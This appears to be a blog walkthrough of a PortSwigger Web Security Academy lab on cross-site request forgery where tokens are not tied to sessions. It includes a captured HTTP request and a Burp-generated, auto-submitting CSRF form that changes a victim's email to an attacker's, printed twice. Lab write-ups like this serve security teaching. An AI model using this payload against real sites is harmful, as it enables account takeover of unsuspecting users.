Skip to content

chojnowski.it

CSRF where token is not tied to user session

CSRF where token is not tied to user session

CSRF where token is not tied to user session¶

Solution¶

L: wiener
P: peter

Change email for user: wiener¶

POST /my-account/change-email HTTP/2
Host: 0aa800520348339482f4fc0f0021008d.web-security-academy.net
Cookie: session=aMQacMUL6kLGWSwNR2GOWLKR9PRhqBpq
Content-Length: 69
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0aa800520348339482f4fc0f0021008d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aa800520348339482f4fc0f0021008d.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

email=wiener1%40normal-user.net&csrf=Rzssfted6TOjT5pwBcPK5H7HqrwbwOIg

Copy CSRF token for user: wiener¶

Make a note of the value of the CSRF token, then drop the request.
CSRF token: t6PTxrZsAGDFsWtYkH1q5vTZ75AFn2EJ

carlos
montoya

Change email address for user: carlos¶

Copy and paste CSRF token: t6PTxrZsAGDFsWtYkH1q5vTZ75AFn2EJ (this is wiener's token)

Create CSRF PoC¶

right-click on the request and select Engagement tools / Generate CSRF PoC
---
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ae000da03edbfa281a0984e00e10014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;carlos&#45;hacker&#46;net" />
      <input type="hidden" name="csrf" value="t6PTxrZsAGDFsWtYkH1q5vTZ75AFn2EJ" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Copy and paste CSRF¶

Copy and paste payload to Body section (Exploit server) and click "Store" and "View explit" and "Delivery exploit to victim"
---
Payload
___
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ae000da03edbfa281a0984e00e10014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;carlos&#45;hacker&#46;net" />
      <input type="hidden" name="csrf" value="t6PTxrZsAGDFsWtYkH1q5vTZ75AFn2EJ" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>